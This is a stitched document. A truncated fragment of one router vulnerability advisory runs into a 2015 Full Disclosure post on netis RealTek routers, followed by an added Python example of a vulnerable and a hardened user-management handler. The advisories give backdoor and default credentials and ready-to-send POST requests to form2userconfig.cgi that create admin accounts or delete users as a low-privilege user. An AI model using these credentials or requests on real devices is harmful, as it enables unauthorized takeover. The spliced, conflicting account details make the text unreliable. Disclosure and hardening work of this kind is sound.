- user/user







 







 







 


2. *Backdoor accounts*
The device comes configured with privileged, backdoor account.

For HTTP, 'guest' with attribute , is the backdoor
account. This is seen in the config file:

This user is not shown / visible in the user list when logged in as admin
(privileged user).


3. *No CSRF protection*
There is no CSRF token set in any of the forms / pages.

It is possible to silently execute HTTP requests if the user is logged in.


4. *Weak RBAC controls*

5a) *A non-admin user (user) can create and delete any other users,
including root-privileged accounts.*

There are three users:

admin:password -> priv 2 is super user account with full functional access
(admin/root)
user:user -> priv 0 -> can access only some functions (user)
guest:airocon -> privileged backdoor login


*Normally:*

- user can create new account with restricted user privs only.
- user can change its password and only other non-admin users.
- user can delete any other non-admin users.

However, the application does not enforce strict rbac and it is possible
for a non-admin user to create a new account with admin privileges.


This is done as follows:

1. Start creating a new user, and intercepting the user creation POST
request
2. Intercept & Change privilege parameter value from 0 (user) to 2 (admin)
- Submit request
3. When the new admin user is created successfully, it does not show up in
user list
4. Confirm via logging in as new admin, and / or configured accounts in
configuration file (config.img)


This is the POST request to create a new user:

*Create user http request*:

POST /form2userconfig.cgi HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http:///userconfig.htm?v=
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=


*Note1*: In some cases, this password change function is not accessible to
'user' via GUI. But we can still send a POST request to create a valid, new
higher privileged account.

*Note2*: In some cases, application does not create admin priv user, in the
first attempt. However, in the 2nd or 3rd attempt, new user is created
without any issue.


*Delete user http request:*
A non-admin user can delete any configured user(s) including privileged
users (admin).

POST /form2userconfig.cgi HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http:///userconfig.htm
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm%


In case (non-admin) user is deleting the admin login (priv 2), action
status can be confirmed by checking the configuration.
In case (non-admin) user is deleting another user login (priv 0), action
status can be confirmed by checking the user list.


5b) *(non-admin priv) User can access unauthorized functions.*
Normally, 'user' does not have access to all the functionality of the
device. It has access to Status, Setup and Maintenance.

However, few functions can still be accessed by calling them directly. For
example, to access the mac filtering configuration this url can be opened
directly:

http:///fw-macfilter.htm

Other functions may also be accessible in this manner.


6. *Sensitive information not secured from low privileged users*

A non-admin privileged user has access to download the configuration file
- config.img.

This file contains clear-text passwords, keys and other sensitive
information which can be used to gain privileged access.


7. *Sensitive information accessible in clear-text*

Sensitive Information like passwords and keys are not secured properly.
Mostly these are either shown in c

[FD] netis RealTek wireless router / ADSL modem Multiple Vulnerabilities

2015-10-15 Thread Karn Ganeshen
# Exploit Title: [netis RealTek wireless router / ADSL modem Multiple
Vulnerabilities]
# Discovered by: Karn Ganeshen
# Reported on: [October 13, 2015]
# Vendor Response: [Vulnerability? What's this?]
# Vendor Homepage: [www.netis-systems.com]
# Version Affected: [Firmware version RTK v2.1.1]


**Vulnerability Details**

*1. Default, weak passwords for http and ftp services*

a. *HTTP accounts*
- guest/guest
- user/user
- guest/airocon

* -> last four digits of MAC address *

b. *FTP accounts*

- admin/admin
- useradmin/useradmin
- user/user


2. *Backdoor accounts*
The device comes configured with privileged, backdoor account.

For HTTP, 'guest' with attribute , is the backdoor
account. This is seen in the config file:

This user is not shown / visible in the user list when logged in as guest
(privileged user).


3. *No CSRF protection*
There is no CSRF token set in any of the forms / pages.

It is possible to silently execute HTTP requests if the user is logged in.


4. *Weak RBAC controls*

5a) *A non-root/non-admin user (user) can create and delete any other
users, including root-privileged accounts.*

In netis RealTek wireless router ADSL modem, there are three users:

guest:guest -> priv 2 is super user account with full functional access
user:user -> priv 0 -> can access only some functions
guest:airocon -> privileged backdoor login


*Normally:*

- user can create new account with restricted user privs only.
- user can change its password and only other non-root users.
- user can delete any other non-root users.

However, the application does not enforce strict rbac and it is possible
for a non-root user to create a new user with root privileges.


This is done as follows:

1. Start creating a new user, and intercepting the user creation POST
request
2. Intercept & Change privilege parameter value from 0 (user) to 2 (root) -
Submit request
3. When the new root user is created successfully, it does not show up in
user list
4. Confirm via logging in as new root, and / or configured accounts in
configuration file (config.img)


This is the POST request to create a new user:

*Create user http request*:

POST /form2userconfig.cgi HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http:///userconfig.htm?v=
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=



*Note1*: In some cases, this password change function is not accessible to
'user' via GUI. But we can still send a POST request to create a valid, new
root privileged account.

*Note2*: In some cases, application does not create root priv user, in the
first attempt. However, in the 2nd or 3rd attempt, new user is created
without any issue.


*Delete user http request:*
A non-root/non-admin user can delete any configured user(s) including
privileged users (guest).

POST /form2userconfig.cgi HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http:///userconfig.htm
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm%



In case (non-root) user is deleting a root login (guest, priv 2), action
status can be confirmed by checking the configuration. In case (non-root)
user is deleting a user login (priv 0), action status can be confirmed by
checking the user list.


5b) *(non-root priv) User can access unauthorized functions.*
Normally, 'user' does not have access to all the functionality of the
device. It has access to Status, Setup and Maintenance.

However, few functions can still be accessed by calling them directly. For
example, to access the mac filtering configuration this url can be opened
directly:

http:///fw-macfilter.htm

Other functions may also be accessible in this manner.


6. *Sensitive information not secured from low privileged users*

A non-root / non-admin privileged user has access to download the
configuration file - config.img.

This file contains clear-text passwords, keys and other sensitive
information which can be used to gain privileged access.


7. *Sensitive information accessible in clear-text*

Sensitive Information like passwords and keys are not secured properly.
Mostly these are either shown in clear-text or cen censored *, it
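
The PROLiNK and netis posts describe the same form2userconfig.cgi weaknesses: the 'privilege' field is stored as sent, deletion is unrestricted, pages such as fw-macfilter.htm can be opened directly, and a privileged 'guest' login never appears in the user list. The following is an added example serving both posts; it is not the firmware's code and not part of either advisory. It parses the POST body the advisories quote, shows the defective add/delete handler beside a fixed one in which the caller's own privilege caps what it may create or remove, enforces a page table on every request, and lists admin-level accounts straight from the store so a login the user-list page hides still surfaces. The account store, its 'hidden' flag and the page table are constructed to match the advisories.

```python
"""Role enforcement for a form2userconfig.cgi-style add/delete flow.

Added example, not from the advisories; accounts and page table are constructed.
"""
from urllib.parse import parse_qs

PRIV_USER, PRIV_ADMIN = 0, 2

# POST body quoted in the advisories: a 'user' asking for privilege 2.
CREATE_BODY = ("username=test&privilege=2&newpass=test&confpass=test"
               "&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=")

# Minimum privilege per page (constructed; the advisories say 'user' is meant
# to reach Status, Setup and Maintenance only). Unknown pages are denied.
PAGE_ACL = {"/status.htm": PRIV_USER, "/userconfig.htm": PRIV_USER,
            "/fw-macfilter.htm": PRIV_ADMIN}


def initial_accounts():
    """Constructed account store mirroring the three accounts in the advisories."""
    return {
        "admin": {"password": "password", "privilege": PRIV_ADMIN, "hidden": False},
        "user": {"password": "user", "privilege": PRIV_USER, "hidden": False},
        "guest": {"password": "airocon", "privilege": PRIV_ADMIN, "hidden": True},
    }


def parse_form(body):
    return {k: v[0] for k, v in parse_qs(body).items()}


def userconfig_vulnerable(accounts, actor, body):
    """Defective handler: privilege taken from the form, no role check at all."""
    form = parse_form(body)
    if "adduser" in form:
        accounts[form["username"]] = {"password": form["newpass"],
                                      "privilege": int(form["privilege"]),
                                      "hidden": False}
        return "added"
    if "deluser" in form:
        accounts.pop(form["username"], None)
        return "deleted"
    return "noop"


def userconfig_fixed(accounts, actor, body):
    """Hardened handler: the actor's privilege bounds every add and delete."""
    form = parse_form(body)
    actor_priv = accounts[actor]["privilege"]
    target = form.get("username", "")
    if "adduser" in form:
        requested = int(form.get("privilege", PRIV_USER))
        # Non-admins may only create plain users; nobody grants more than it holds.
        if requested > actor_priv or (actor_priv < PRIV_ADMIN and requested != PRIV_USER):
            return "forbidden"
        if not target or target in accounts:
            return "bad username"
        if not form.get("newpass") or form.get("newpass") != form.get("confpass"):
            return "bad password"
        accounts[target] = {"password": form["newpass"], "privilege": requested,
                            "hidden": False}
        return "added"
    if "deluser" in form:
        if target not in accounts:
            return "no such user"
        # Non-admins may remove only accounts below admin level.
        if actor_priv < PRIV_ADMIN and accounts[target]["privilege"] >= PRIV_ADMIN:
            return "forbidden"
        del accounts[target]
        return "deleted"
    return "noop"


def page_allowed(accounts, actor, path):
    """Check the page table on every request, not only when building the menu."""
    needed = PAGE_ACL.get(path)
    return needed is not None and accounts[actor]["privilege"] >= needed


def hidden_privileged_accounts(accounts):
    """Admin-level accounts that the user-list page would not display."""
    return sorted(u for u, a in accounts.items()
                  if a["privilege"] >= PRIV_ADMIN and a["hidden"])


if __name__ == "__main__":
    acc = initial_accounts()
    print("vulnerable:", userconfig_vulnerable(acc, "user", CREATE_BODY), acc["test"])
    acc = initial_accounts()
    print("fixed:     ", userconfig_fixed(acc, "user", CREATE_BODY), "test" in acc)
    print("delete admin as user:",
          userconfig_fixed(acc, "user", "username=admin&deluser=Delete"))
    print("user -> /fw-macfilter.htm:", page_allowed(acc, "user", "/fw-macfilter.htm"))
    print("hidden admins:", hidden_privileged_accounts(acc))
```

The point of `hidden_privileged_accounts` is that the review of who holds admin rights must come from the account store (on these devices, the same data that ends up in config.img), not from the list the UI chooses to render; a UI-only listing is precisely how the 'guest' login stays out of sight.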